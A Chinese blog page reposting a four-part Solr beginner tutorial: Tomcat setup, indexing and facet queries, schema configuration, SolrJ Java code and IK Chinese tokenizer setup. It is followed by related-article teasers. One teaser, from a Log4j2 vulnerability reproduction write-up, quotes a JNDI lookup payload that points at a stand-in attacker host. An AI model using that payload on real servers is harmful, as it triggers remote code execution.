solr初体验

【1】http://cxshun.iteye.com/blog/1039445

由于工作原因，这段时间接触到solr，一个基于lucene的企业级搜索引擎。不怎么了解它的童鞋可以去GOOGLE一下。

下面开始正题：

1）要开始solr的学习，首先当然是要下载它啦（这是一句废话），可以到http://www.apache.org/dyn/closer.cgi/lucene/solr/这里去下载，最新的是1.4.1。下完后当然要解压啦（这也是废话）。我们看到它的结构是这样的。

相信搞JAVA的同志们应该都大概了解对应的文件夹的意思啦，在dist里面是它的一些JAR包，当中包含了一个war包，这个是我们做例子时用到的项目。直接把它丢到tomcat的webapps里面去。

example目录里面有一些solr的索引数据，它自带了一个jetty方便运行，可以直接运行java -jar start.jar就可以运行jetty，但jetty的默认端口是8983，这个是跟tomcat不同的地方，要注意啦。

2）搞定了这些之后，那么我们应该继续来试运行一下这个东西啦。solr最重要的东西就是solr home，这个东西指定了solr建立的索引文件的存放位置。不知道是什么东西，可以先不用管它，一步步来也许就会明白了。

进到tomcat文件夹conf\Catalina\localhost这个文件夹内，建立一个solr.xml（其实名字是随便的，这里起的名字跟以后访问的项目名字一致，不过为了好找，还是跟部署的项目名一样吧），这里面的内容呢，其实很简单，就和下面类似：

Xml代码

<Context docBase="D:/server/apache-tomcat-6.0.32/webapps/apache-solr-1.4.1.war" reloadable="true">
<Environment name="solr/home" type="java.lang.String" value="E:/framework/libPack/apache-solr-1.4.1/example/solr" override="true" />
</Context>

这个Context相信大家都知道罗，它是指定了war包的位置，当启动tomcat后它会自动被部署到webapps目录下，这也是eclipse所集成tomcat用的部署方式。而reloadable="true"则表明可以重新加载，即当这个部署内容改变时，它会自动进行加载。

下面的solr/home是重点啦，type是固定的，先不管，value指定的就是它用的索引目录。override当然就是覆盖啦，如果存在则覆盖。

这个solr/home其实在solr的下载包中已经带有一个，我们可以找到solr目录下的example/solr这个目录，下面就是我们所说的solr/home，其实当中最重要的还是config目录下的solrconfig.xml，这个是solr的主要配置文件，可以在里面找到<dataDir>${solr.data.dir:./solr/data}</dataDir>这样一句，它指定了索引记录放置的位置，我们启动tomcat后它会在我们当前的目录下生成solr/data文件夹，里面就是索引文件。如果我们从tomcat的bin启动，那么它会在bin目录下生成solr/data文件夹，可以根据自己需要进行修改，只要把./solr/data改成想让它放在目录就可以了。

这样配置完成后，我们启动tomcat之后在浏览器输入http://localhost:8080/solr/admin就可以看到solr的管理界面啦。

这样我们的配置就大功告成了。

曾经看过javaeye上一位朋友问过淘宝上的分面搜索是怎么实现的，当时有一位高人说是用solr，没想到它可以做出这么牛的东西，还有好多要学习呢。

---------------------------------------------------------------------------

【2】http://cxshun.iteye.com/blog/1040656

接着上篇http://cxshun.iteye.com/blog/1039445，我们讲了怎么初始化配置solr，并运行。问题来了，当我们配置完成后，索引当中并没有任何东西，就是说我们查询得到的结果永远是0。

现在这篇文章，我们要讲的就是如果添加数据和删除数据，并体验一下solr的基本请求参数的用法。

1）首先，我们必须知道，solr添加数据类型可以有多种格式，最常用的是XML和JSON，这两种的可读性是最好的。在solr的example/exampledocs文件夹内有自带一些XML格式的文件，便于我们进行添加数据。

首先呢，又是一些废话，当然是启动example自带的jetty啦，还是上次的命令，java -jar start.jar。

接着另外开一下cmd，进入到example/exampledocs文件夹内，运行java -jar post.jar *.xml，这里的*.xml代表文件夹内的所有XML文件，当然你也可以选择其他一个进行添加，执行后我们看到执行结果。

看到最后一句，它表明提交这次索引所有的变化。这个提交的设置我们在后面会看到它的用法。

2）这里我们再进入到solr的管理页面，http://localhost:8983/solr/admin，我们直接搜索solr，看到页面大概如下：

我们进行搜索的结果默认是用XML格式显示，当然我们可以让它用JSON格式来显示，只要加上wt=json即可，加上后我们看到的结果为：

可以看到正确的结果。

http://localhost:8983/solr/select/?q=solr&version=2.2&start=0&rows=10&indent=on&wt=json下面我们分析一下这个链接中参数的意义，q当然是搜索的内容啦，version暂时可以不管，用处不在，start和rows与hibernate中的分页参数类似，指开始的记录位置和查询的条数，indent指返回代码的缩进，可以试一下不加这个和加这个的区别，wt则是返回的结果格式。

3）上面是我们用的它自带的XML文件提交的结果，下面我们自己来写一个。为了方便，我们就参照它的救命文件写一个。我们找到schema.xml可以看到：

这个是它允许我们提交的field的名称，我们就参照这些字段写几个试试吧。我把这个文件命名为test.xml

Xml代码

<add>
<doc>
<field name="id">Donnie Yen</field>
<field name="text">Great</field>
</doc>
</add>

接着我们用java -jar post.jar test.xml出现下面的结果：

这表明我们的数据已经提交成功，我们可以搜索一下：

http://localhost:8983/solr/select/?q=text:great&version=2.2&start=0&rows=10&indent=on

这表明我们提交的数据已经成功更新到索引了。

4）说了添加，现在也该来删除一些东西了，我们想删除我们刚才添加的那条记录，我们可以发送命令java -Ddata=args -jar post.jar "<delete><id>Donnie Yen</id></delete>"（这个命令中的-Ddata=args表明数据是中参数中获取），出现

则我们删除成功，不确定？那么我们再去查一下：

没了吧，证明我们删除成功了。

这些东西不难吧。solr用得比较多的东西就是分面浏览，也就是facet navigation。下面我们来学习一下。

5）分面浏览指的是像淘宝的功能一样，我们搜索一种产品，它会在上面再根据类别分出好多小类，直接看图：

我们看到它又分出了好多类，这种效果就叫分面浏览。

solr可以轻松做到分面浏览，比如我们在浏览器输入http://localhost:8983/solr/select/?q=solr&version=2.2&start=0&rows=10&indent=on&facet=true&facet.field=name&facet.query=price:[300%20TO%20400]，我们可以看到：

这就是分面浏览的结果，它根据每个值再重新统计，统计出该类别下有多少个值。分面浏览的参数比较多，大家可以上WIKi上面看看http://wiki.apache.org/solr/SimpleFacetParameters。

--------------------------------------------------------------------------------------------------------------

【3】http://cxshun.iteye.com/blog/1041742

前两天，学习了solr的基本用法，接下来我们就开始真正来学习一下solr。学习一下它的文件结构，配置文件等。

以我们现在学习的阶段，最重要的文件夹就是example文件夹，这个里面包含了许多我们要学习的东西。

我们再来看一下该文件夹结构

我们看到这样的文件结构，文件夹的意思大家肯定都看得懂，这里只介绍两个文件夹，multicore和solr。

multicore是多个solr实例时才需要用到，现在我们暂时没用，先不管它。solr是自带的一个solr.home，这个是我们此次介绍的重点。

进入此文件夹，我们可以看到如下的结构：

bin文件夹为我们有额外的处理脚本时，需要放在这里，这里暂时没用到，我们先跳过。

conf是solr的配置文件所在，这里是重点。

data为索引目录。

由于我以为运行过，所以有这个data.bak目录，这具是以前的备份。

我们主要来看一下conf文件夹内的配置文件：

这里带副本的是我的备份文件。最主要的文件是schema.xml和solrconfig.xml，其余的如stopwords.txt为停顿词，当索引和查询时遇到这些词会自动忽略，其他文件，我们暂时不用，先不讲了。

打开solrconfig.xml我们可以看到<dataDir>这个标签，默认情况下是这样的

它默认在当前目录下的solr目录下创建data目录来存放索引。这就是为什么当我们把solr.home设置成这个时，在tomcat的bin文件夹内启动时会生成solr/data文件夹。因为我们启动tomat时的当前目录为bin。

当然这个不是solr配置错误，对于它自带的jetty服务器来说，它是正确的，因为当前目录，正好是solr的目录。

这个文件我们需要配置的东西不多，先讲到这里，以后用到时再慢慢讲解。

接下来我们看一下重点的schema.xml，这个文件是对我们索引字段的说明，我们可以索引什么field都在这里进行了说明。

我们可以看到里面有一大堆注释，其实看里面的注释，大部分都是可以理解的。这个文件的配置跟我们以后需要进行的中文分词的集成有很大关系，所以这个文件要多看看。

我们看到types标签，而在它里面有一大堆fieldType，里面也有一大堆属性，这里大概介绍一下：

fieldType是定义索引的field类型，它有好几个属性，最主要的是name和class：

name是类型的名称，class是相应的solr中的类。还有两个属性看英文注释可能比较难理解，是sortMissingLast和sortMissingFirst，这两个属性是指当查找出来的内容为空时，它被排在哪里，当sortMissingLast为true时，表示放在最后，sortMissingFirst为true时，表示放在最前。为false时相反。

注意，我们看到后面时发现有fieldType里面有<Analyzer>标签，这个是用于配置分词器的，这个我们以后再说。

接着是<fields>标签和在它里面的<field>，field当然就是我们在索引的内容啦。

它有属性indexed和stored分别对应是否索引和保存，另外还有一个multiValued表示是否允许多值。

这里我们看到features有好几个值，而我们看到配置文件中配置的features也是这样的：

Xml代码

<field name="features" type="text" indexed="true" stored="true" multiValued="true"/>

它表示我们索引的field有多个值，如果这里没配置，在发送数据的时候会报错。

这里的type是对应我们前面配置的fieldType。

另外有一个<dynamicField>这是一个动态匹配的域，

Xml代码

<dynamicField name="*_i" type="int" indexed="true" stored="true"/>

我们看到它的name指定了通配符，它指的是可以匹配所有以_i结尾的名称的field，如果我们指定

Xml代码

<dynamicField name="*"/>

那我们就可以匹配所有的field。

接下来，我们看到：

Xml代码

<uniqueKey>id</uniqueKey>

Xml代码

<defaultSearchField>text</defaultSearchField>

Xml代码

<solrQueryParser defaultOperator="OR"/>
<copyField source="cat" dest="text"/>

这里应该看英文就可以看明白了，最主要是最下面的copyField，它是指复制field，它会把在source field里的值拷贝到text field里面，这样方便进行索引。注意，这里一般也只有对多值的才会这样做，也即是配置了multiValued为true的field才用copyField.

--------------------------------------------------------------------------------------------------------------

【4】http://cxshun.iteye.com/blog/1043200

前几次我们讲到了solr的基本用法和配置文件，接下来就开始进入我们真正的代码之旅啦。

1）首先以一个简单的程序来开头：

Java代码

public static void main(String[] args) throws SolrServerException, IOException, ParserConfigurationException, SAXException{
//设置solr.home，注意这时通过环境变量是solr.solr.home
System.setProperty("solr.solr.home","E:\\solr");
//初始化容器，让它加载solr.home的配置文件
CoreContainer.Initializer initializer = new CoreContainer.Initializer();
CoreContainer coreContainer = initializer.initialize();
EmbeddedSolrServer solrServer = new EmbeddedSolrServer(coreContainer,"");
//构造参数列表
SolrQuery solrQuery = new SolrQuery();
Map<String,String> map = new HashMap<String,String>();
map.put(FacetParams.FACET_DATE, "manufacturedate_dt");
map.put(FacetParams.FACET_DATE_START,"2004-01-01T00:00:00Z");
map.put(FacetParams.FACET_DATE_END,"2010-01-01T00:00:00Z");
map.put(FacetParams.FACET_DATE_GAP,"+1YEAR");
map.put("indent","on");
map.put("wt","xml");
map.put("hl.fl","name");
SolrParams params = new MapSolrParams(map);
solrQuery.add(params);
solrQuery.setFacet(true);
solrQuery.setFields("name,price,score");
solrQuery.setQuery("solr");
solrQuery.setSortField("price",SolrQuery.ORDER.asc);
solrQuery.setHighlight(true);
System.out.println(solrQuery.toString());
QueryResponse queryResponse = solrServer.query(solrQuery);
System.out.println(queryResponse.toString());
System.out.println("共找到:"+queryResponse.getResults().getNumFound()+"个结果");
//解析返回的参数
SolrDocumentList sdl = (SolrDocumentList)queryResponse.getResponse().get("response");
for (int i = 0; i< sdl.size(); i++){
Object obj = sdl.get(i).get("manufacturedate_dt");
String date = "";
if (obj!= null){
date = new SimpleDateFormat("yyyy-MM-dd").format((Date)obj);
}
System.out.println(((SolrDocument)sdl.get(i)).get("name")+":"+date+":"+(sdl.get(i).get("price")));
}
}

这时我们所用到的是EmbeddedSolrServer，它是用于嵌入式地solr服务，这里我们不需要向外提供服务，所以我们就用到这个。另外有一个

CommonsHttpSolrServer这个类是用于发送指令的服务，例如我们需要发送HTTP命令来查询，就可以用这个。

下面我们分析一下代码，首先，我们设置了一个环境变量的名称为solr.solr.home，是这个，你没看错，确实是要这样。接下来我们初始化容器，让它加载solr.home的配置文件等。接下来的一系统代码就是构造参数列表。

我们构造完成后的参数列表是这样的：facet.date.start=2004-01-01T00%3A00%3A00Z&indent=on&facet.date=manufacturedate_dt&hl.fl=name&facet.date.gap=%2B1YEAR&wt=xml&facet.date.end=2010-01-01T00%3A00%3A00Z&facet=true&fl=name%2Cprice%2Cscore&q=solr&sort=price+asc&hl=true

跟我们直接在浏览器输入的不太一样，因为它是进行过编码的。构造完成后我们就可以用solrServer进行查询了。

查询得到的结果是JSON格式的，注意，通过程序来查询得到的都是JSON格式，而不是XML格式，不过这样更好，方便我们进行接下来的解析。

接下来的代码就是解析内容啦，应该很容易看懂的。

2）接下来的我们就尝试自己写一个程序来进行索引，而不用post.jar。

程序代码如下：

Java代码

public static void main(String[] args) throws IOException, ParserConfigurationException, SAXException{
System.setProperty("solr.solr.home","e:\\solrIndex");
//这下面三行代码主要是用于加载配置文件
SolrConfig solrConfig = new SolrConfig("E:\\solrIndex\\conf\\solrconfig.xml");
FileInputStream fis = new FileInputStream("E:\\solrIndex\\conf\\schema.xml");
IndexSchema indexSchema = new IndexSchema(solrConfig,"solrconfig",fis);
SolrIndexWriter siw = new SolrIndexWriter("solrIndex","E:\\solrIndex",new StandardDirectoryFactory()
,true,indexSchema);
Document document = new Document();
document.add(new Field("text","测试一下而已",Field.Store.YES,Field.Index.ANALYZED,Field.TermVector.WITH_POSITIONS_OFFSETS));
document.add(new Field("test_t","再测试一下而已",Field.Store.YES,Field.Index.ANALYZED,Field.TermVector.WITH_POSITIONS_OFFSETS));
siw.addDocument(document);
siw.commit();
siw.close();
SolrCore solrCore = new SolrCore("E:\\solrIndex",indexSchema);
SolrIndexSearcher sis = new SolrIndexSearcher(solrCore,indexSchema,"solrIndex",
new StandardDirectoryFactory().open("E:\\solrIndex"),true);
TopDocs docs = sis.search(new TermQuery(new Term("test_t","再")),1);
System.out.println("找到"+docs.totalHits+"个结果 ");
for (int i = 0; i < docs.scoreDocs.length; i++) {
System.out.println(sis.doc(docs.scoreDocs[i].doc).get("test_t"));
}
}

代码不难理解，所以就没写注释了。主要是那段加载配置文件的代码。接下来是添加索引，然后是查询索引，删除的比较简单，直接一句代码

Java代码

solrServer.solrServer.deleteById("SOLR1000");

或者

Java代码

solrServer.deleteByQuery()

都比较简单。

3）接下来我们讲一下，很可能会在项目中用到的，就是中文分词，中文分词有蛮多的，有IK，Paoding，mmseg4j，还有另外一些中科院什么地方的。但个人建议用IK或者mmseg4j，这两个有solr都有比较直接的支持，paoding也可以，但可能需要自己写类继承BaseTokenizerFactory然后再进行配置，不难。

上面的例子就是用到中文分词了，如果你发现找不到结果，那很正常，因为还没添加中文分词，你可以把中文改成英文，再查一下，就可以查出来了。

需要添加中文分词，我们要在schema.xml中做文章。找到types标签，在里面找到你想要进行中文分词的类型，比如text类型，我们想要让它的内容用中文分词来进行分析，可以进行配置：

Xml代码

<analyzer type="index">
<tokenizer class="org.wltea.analyzer.solr.IKTokenizerFactory"/>
<filter class="solr.StopFilterFactory"
ignoreCase="true"
words="stopwords.txt"
enablePositionIncrements="true"
/>
<filter class="solr.WordDelimiterFilterFactory" generateWordParts="1" generateNumberParts="1" catenateWords="1" catenateNumbers="1" catenateAll="0" splitOnCaseChange="1"/>
<filter class="solr.LowerCaseFilterFactory"/>
<filter class="solr.SnowballPorterFilterFactory" language="English" protected="protwords.txt"/>
</analyzer>
<analyzer type="query">
<tokenizer class="org.wltea.analyzer.solr.IKTokenizerFactory"/>
<filter class="solr.SynonymFilterFactory" synonyms="synonyms.txt" ignoreCase="true" expand="true"/>
<filter class="solr.StopFilterFactory"
ignoreCase="true"
words="stopwords.txt"
enablePositionIncrements="true"
/>
<filter class="solr.WordDelimiterFilterFactory" generateWordParts="1" generateNumberParts="1" catenateWords="0" catenateNumbers="0" catenateAll="0" splitOnCaseChange="1"/>
<filter class="solr.LowerCaseFilterFactory"/>
<filter class="solr.SnowballPorterFilterFactory" language="English" protected="protwords.txt"/>
</analyzer>

你可以先不理解filter的那些东西，但你一定要理解tokenizer这些地方的配置，它配置了你想要应用的分词器，它必须继承于BaseTokenizerFactory。我们看到analyzer有一个type属性，它表示你要在哪个阶段运用此分词器，如果索引和查询都要用，我们可以不写type，这样solr就会在索引和查询时都使用此分词器，这样配置完成后就可以进行中文分词的测试啦。我们重新把上面的例子添加中文进行索引，然后查询出来，看有没有问题。我的运行结果如下：

我们找到了结果，证明我们的中文分词已经没问题了。

你可能感兴趣的:(Solr)

分布式搜索引擎Elasticsearch——基础敲代码的旺财架构进阶 elasticsearch java 搜索引擎 ES-head
文章目录一、Lucene与Solr与Elasticsearch二、ES核心术语三、ES核心概念四、倒排索引五、ES的安装（centos7）1、下载地址（这里安装linux版本）2、解压压缩包3、修改配置文件(1)修改核心配置文件(2)修改JVM配置文件4、启动ES(1)添加系统用户并授权(2)ES启动(3)修改配置文件(4)再次启动ES六、安装ES-head插件（可视化管理插件）1、使用谷歌市场安
Java高级技术day75：Zookeeper与Dubbo 开源oo柒
一、Zookeeper的介绍1.Zookeeper介绍：顾名思义zookeeper就是动物园管理员，他是用来管hadoop（大象）、Hive(蜜蜂)、pig(小猪)的管理员，ApacheHbase和ApacheSolr的分布式集群都用到了zookeeper；Zookeeper:是一个分布式的、开源的程序协调服务，是hadoop项目下的一个子项目。他提供的主要功能包括：配置管理、名字服务、分布式锁、
Elasticsearch详解es 思静语 elasticsearch elasticsearch 大数据搜索引擎
文章目录概述es架构为什么要使用ElasticSearchElasticSearch的优势使用场景es为什么这么快倒排索引如何保证ES和数据库的数据一致性监听binlog同步双写elasticsearch是如何实现master选举的Elasticsearch与Solr的区别概述ES全称是ElasticSearch，它是一个建立在全文搜索引擎库Lucene基础上的开源搜索和分析引擎。ES它本身具有分
08、全文检索 -- Solr -- 使用 SolrClient 连接 Solr（演示手动配置自定义的SolrClient 并在测试类使用 solrClient 进行添加、查询、删除文档的操作） _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr lucene
目录SolrClientSolrClient的功能SolrClient这个API包含如下常用方法：SolrClient方法的说明：SpringBootStarterDataSolr的不足手动配置自定义的SolrClientSolrClient代码演示配置自定义的SolrClient1、创建一个SpringBoot项目，添加依赖2、SolrAutoConfiguration解析3、手动配置自定义的S
java 商城全文搜索_利用solr实现商品的搜索功能闲侃数码 java 商城全文搜索
后期补充：为什么要用solr服务，为什么要用luncence？问题提出：当我们访问购物网站的时候，我们可以根据我们随意所想的内容输入关键字就可以查询出相关的内容，这是怎么做到呢？这些随意的数据不可能是根据数据库的字段查询的，那是怎么查询出来的呢，为什么千奇百怪的关键字都可以查询出来呢？答案就是全文检索工具的实现，luncence采用了词元匹配和切分词。举个例子：北京天安门------luncenc
solr7集群 springboot_springboot 集成solr 骑lv上高速 solr7集群 springboot
一、版本介绍：jdk1.8tomcat8springboot2.1.3RELEASE(这里有坑,详见下文)solr7.4.0(没有选择最新的版本,是因为项目的boot版本是2.1.3,其对应的solr-solrj.jar版本是7.4.0，为避免出现不可预料不可抗拒不可解决的问题，谨慎选用与之一样版本)二、solr服务器搭建下载1.tomcat8的下载不赘述；2.solr下载：进入solr官网，找历
09、全文检索 -- Solr -- SpringBoot 整合 Spring Data Solr （生成DAO组件和实现自定义查询方法） _L_J_H_ #全文检索（Solr 和 Elasticsearch）spring 全文检索 solr
目录SpringBoot整合SpringDataSolrSpringDataSolr的功能（生成DAO组件）：SpringDataSolr大致包括如下几方面功能：@Query查询（属于半自动）代码演示：1、演示通过dao组件来保存文档1、实体类指定索引库2、修改日志级别3、创建Dao接口4、先删除所有文档5、创建测试类6、演示结果2、根据title_cn字段是否包含关键字来查询3、查询指定价格范围
vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）余生有个小酒馆 vulhub漏洞复现 apache log4j 安全
ApacheLog4j2是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。1.服务启动后，访问`http://your-ip:8983`即可查看到ApacheSolr的后台页面。2.`$
solr —— 1 全文检索Solr8.0第一部分苏打饼干没加心 solr
solr，毕设啊，快被写完吧1solr介绍什么是solrLucene与Solr与ES为什么要用slor2HelloWorld2.1项目安装部署2.2项目安装配置创建核心创建document(表)添加文件查询数据3solr后台管理页面详解控制面板5全文检索千万级别数据实战，全面剖析架构设计，大数据瓶颈突破6数据库导入索引BV1Dt411G7eF1solr介绍什么是solrsolr简化了程序员的操作L
（三十七）大数据实战——Solr服务的部署安装厉害哥哥吖大数据大数据 solr
前言Solr是一个基于ApacheLucene的开源搜索平台，它提供了强大的全文搜索、分布式搜索和数据分析功能。Solr可以用于构建高性能的搜索应用程序，支持从海量数据中快速检索和分析信息。Solr使用倒排索引和先进的搜索算法，可实现快速而准确的全文搜索。Solr可以在多个服务器上进行水平扩展，实现分布式搜索和负载均衡。Solr支持复杂的过滤、排序和范围查询，使您可以根据各种条件对搜索结果进行精确
ElasticSearch VS. Solr VS. Sphinx：最好的开源搜索引擎比较 chenxiyy3773 大数据人工智能数据库
译者按：本文是来自一家乌克兰技术公司的文章。该文章译者认为着重在应用上，而非单纯的性能对比。给自己的平台选择一个合适的搜索引擎比任何一个吹嘘技术强大的好。虽然最近一两年ES发展飞速，但sphinx的简单易用性还是赢得很多机构公司的青睐，比如优酷土豆都是用sphinx。所以使用之前，务必先了解自己的业务诉求，再选择合适的搜索引擎，而非一昧跟风。翻译若有误请指正，谢谢查看！编译自：ELASTICSEA
阿里P8架构师谈：开源搜索引擎Lucene、Solr、Sphinx等优劣势比较 liuhuiteng 中间件中间件
开源搜索引擎分类1.Lucene系搜索引擎，java开发,包括：LuceneSolrElasticsearchKatta、Compass等都是基于Lucene封装。你可以想象Lucene系有多强大。2.Sphinx搜素引擎，c++开发,简单高性能。以下重点介绍最常用的开源搜素引擎：Lucene、Solr、Elasticsearch、Sphinx的特点和优劣势选型比较。Lucene1.Lucene简
使用solr6.0搭建solrCloud 牛初九
使用solr6.0搭建solrCloud一、搭建zookeeper集群下载zookeeper压缩包到自己的目录并解压（本例中的目录在/opt下），zookeeper的根目录我们在这里用${ZK_HOME}表示。在${ZK_HOME}/conf下创建zoo.cfg文件，可以复制zoo_sample.cfg文件：cpzoo_sample.cfgzoo.cfg修改zoo.cfg的内容如下：vimzoo.
Error CREATEing SolrCore 'index': Unable to create core: index Caused by: No enum constant org.apach 杉斯狼后台 Java solr enum 索引 lucene
ErrorCREATEingSolrCore'index':Unabletocreatecore:indexCausedby:Noenumconstantorg.apache.lucene.util.Version.LUCENE_48出错原因：solr版本配置不正确解决方法：在索引文件的目录下conf>solrconfig.xml4.8将4.8修改为4.7（你具体的版本，可以参照collectio
solr 或查询 or query 杉斯狼 solr solr java web java lucene
MenuId:(472e44eaac735772ef44366OR80f24930dcf7131262d9OR51e8f9844f8bd1283ac)如上句，格式为key:(value1ORvalue2ORvalue3OR...)注意，OR必须为大写，同时两边各有一空格。
尚学堂102天总结+springdata-redis 人间草木为伴
102天行百里者半九十，想要在一个行业里成为顶尖人才，一定满足一万小时定律，要想学好JAVA，需要持之以恒不断地努力,每天都要勤思考+善于询问+解决问题!知识温故而知新>>>>>>Linux下安装solr的教程555.pngSpringBoot2.2以上版本添加junit进行测试的方法h111.pngMaven依赖中标签的作用image.png./的作用和用法image.png启动和关闭redis
开源大数据集群部署（九）Ranger审计日志集成（solr）大数据部署
作者：櫰木1、下载solr安装包并解压包tar-xzvfsolr-8.11.2.gzcdsolr-8.11.2执行安装脚本./bin/install_solr_service.sh/opt/solr-8.11.2.tgz安装后，会在/etc/default/下生成solr.in.sh文件。2、在rangeradmin下生成solr相关配置cd/opt/ranger-2.3.0-admin/cont
Lucene/Solr/Elasticsearch可视化工具luke的下载及使用景小悦 lucene luke elasticsearch solr
※※使用的luke版本一定与lucene一致，否则会出现问题。luke下载地址：https://github.com/DmitryKey/luke/releasesluke是一个用于Lucene/Solr/Elasticsearch搜索引擎，方便开发和诊断的GUI（可视化）工具。luke:Luke是查询LUCENE索引文件的工具，而且用Luke的Search可以做查询Lukeisahandydev
CVE-2017-12149漏洞复现黑客大佬漏洞复现 web安全安全网络 python
服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现中间件及框架列表：IIS，Apache，Nginx，Tomcat，Docker，Weblogic，JBoos，WebSphere，Jenkins，GlassFish，Jira，Struts2，Laravel，Solr，Shiro，Thinkphp，Spring，Flask，jQuery等1、中间件-Web
【知识整理】技术新人的培养计划卢卡上学文心一言 AIGC 人工智能 php 技术团队新人培养 git
一、培养计划落地实操1.概要新人入职，要给予适当的指导，目标：1、熟悉当前环境：生活环境：吃饭、交通、住宿、娱乐工作环境：使用的工具，Mac、maven、git、idea等2、熟悉并掌握工作技能：技术栈：Spring、Hibernate、Cache、Solr、MySQL（根据公司内部技术使用调整）内部协作工具：wiki（Confluence）、task（JIRA）、git（Stash）快捷操作：M
Apache Log4j2漏洞复现（反弹shell）安全菜 apache
0x01漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。漏洞利用无需特殊配置，经阿里云安全团队验证，ApacheStruts2、ApacheSolr、ApacheDruid、Apa
2021最新版 ElasticSearch 7.6.1 教程详解爬虫jsoup+es模拟京东搜索（狂神说） Super_Song_ 中间件 elasticsearch 搜索引擎 java nosql
文章目录一、ElasticSearch简介1.了解创始人DougCutting2.Lucene简介3.ElasticSearch简介4.ElasticSearch和Solr的区别5.了解ELK二、软件安装1.ElasticSearch2.ElasticSearchHead3.Kibana三、ElasticSearch使用详解1.ES核心概念文档索引倒排索引ik分词器2.命令模式的使用Rest风格说
大数据用户画像系统架构设计充电了么
文章目录一、用户画像数据仓库搭建、数据抽取部分二、大数据平台、用户画像集市分层设计、处理三、离线计算部分四、实时计算部分五、Solr/ES搜索引擎部分六、JavaWeb毫秒级实时用户画像接口服务七、用户画像实时展示异步触发获取Web自助后台总结用户画像是一个非常通用普遍使用的系统，从我们的架构图中可以看出，从数据计算时效性上来讲分离线计算和实时计算。离线计算一般是每天晚上全量计算所有用户，或者按需
Apache Log4j2 漏洞原理仲瑿漏洞原理 apache log4j java
ApacheLog4j远程代码执行漏洞1.漏洞危害ApacheLog4j被发现存在一处任意代码执行漏洞，由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。经验证，ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等众多组件与大型应用均受影响2.影响版本ApacheLog4j2.x<=2.14.13.漏
rm: relocation error: /lib64/libc.so.6: symbol _dl_starting_up, version GLIBC_PRIVATE not defined in feifeidata
由于安装glibc-2.23.tar.gz导致系统出错，命令不能用恢复方法：进入/usr/lib64目录，使用ls-ltr命令ls-ltrlrwxrwxrwx.1rootroot2112月1421:46ld-linux-x86-64.so.2->/usr/lib64/ld-2.17.solrwxrwxrwx.1rootroot2312月1421:51libc.so.6->/usr/lib64/li
安全漏洞(1)-Log4j2远程代码执行漏洞，log4j2漏洞验证迷途的小兵安全体系_加解密算法安全 log4j2 安全漏洞
漏洞描述ApacheLog4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了ApacheLog4j2远程代码执行漏洞。由于ApacheLog4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行漏洞。ApacheStruts2、ApacheSolr、ApacheDruid、ApacheFlink等均受影响。漏洞评级CVE-2021
揭秘Elasticsearch：一文读懂分布式搜索与分析引擎的核心概念超越不平凡 elasticsearch 分布式大数据
Elasticsearch是一个开源、分布式、实时搜索和分析引擎，专门用于处理大规模数据的快速检索与分析。它建立在ApacheLucene的基础上，但提供了比Lucene更为丰富的功能和友好的RESTfulAPI接口，使得开发者能够轻松地进行全文搜索、结构化搜索以及对海量数据进行复杂的聚合操作。Elasticsearch目前被广泛用于互联网多种领域中。一是搜索领域，相对于solr，成为很多搜索的不
07、全文检索 -- Solr -- Solr 全文检索之为索引库添加中文分词器 _L_J_H_ #全文检索（Solr 和 Elasticsearch）全文检索 solr 中文分词
目录Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词器的jar包2、修改managed-schema配置文件什么是fieldType3、添加停用词文档4、重启solr5、添加【*_cn】动态字段，并为该字段设置中文分词器6、演示分词器的区别演示text_cjk这个简单的分词器演示text_cn这个中文分词器Solr全文检索之为索引库添加中文分词器添加中文分词器1、添加中文分词
全文检索服务器：Solr xiayehuimou solr solr 全文检索服务器
官网https://solr.apache.org/官方文档https://solr.apache.org/guide/solr/latest/deployment-guide/solrj.html1.介绍Solr是一个高性能，采用Java开发，基于Lucene的开源全文搜索服务器不仅限于搜索，Solr也可以用于存储目的。像其他NoSQL数据库一样，它是一种非关系数据存储和处理技术。solr需要运
php solr 全文检索引擎,【搜索引擎】Solr Suggester 实现全文检索功能-分词和和自动提示... 一十马 php solr 全文检索引擎
功能需求全文检索搜索引擎都会有这样一个功能：输入一个字符便自动提示出可选的短语：要实现这种功能，可以利用solr的SuggestComponent，SuggestComponent这种方法利用Lucene的Suggester实现，并支持Lucene中可用的所有查找实现。实现1.配置managed-schema文件配置自己core文件夹conf下的managed-schema文件这个是自己的字段：新
ASM系列六利用TreeApi 添加和移除类成员 lijingyao8206 jvm 动态代理 ASM 字节码技术 TreeAPI
同生成的做法一样，添加和移除类成员只要去修改fields和methods中的元素即可。这里我们拿一个简单的类做例子，下面这个Task类，我们来移除isNeedRemove方法，并且添加一个int 类型的addedField属性。 package asm.core; /** * Created by yunshen.ljy on 2015/6/
Springmvc-权限设计 bee1314 spring Web jsp
万丈高楼平地起。权限管理对于管理系统而言已经是标配中的标配了吧，对于我等俗人更是不能免俗。同时就目前的项目状况而言，我们还不需要那么高大上的开源的解决方案，如Spring Security，Shiro。小伙伴一致决定我们还是从基本的功能迭代起来吧。目标： 1.实现权限的管理（CRUD） 2.实现部门管理（CRUD) 3.实现人员的管理（CRUD） 4.实现部门和权限
算法竞赛入门经典（第二版）第2章习题 CrazyMizzz c 算法
2.4.1 输出技巧 #include <stdio.h> int main() { int i, n; scanf("%d", &n); for (i = 1; i <= n; i++) printf("%d\n", i); return 0; } 习题2-2 水仙花数(daffodil
struts2中jsp自动跳转到Action 麦田的设计者 jsp webxml struts2 自动跳转
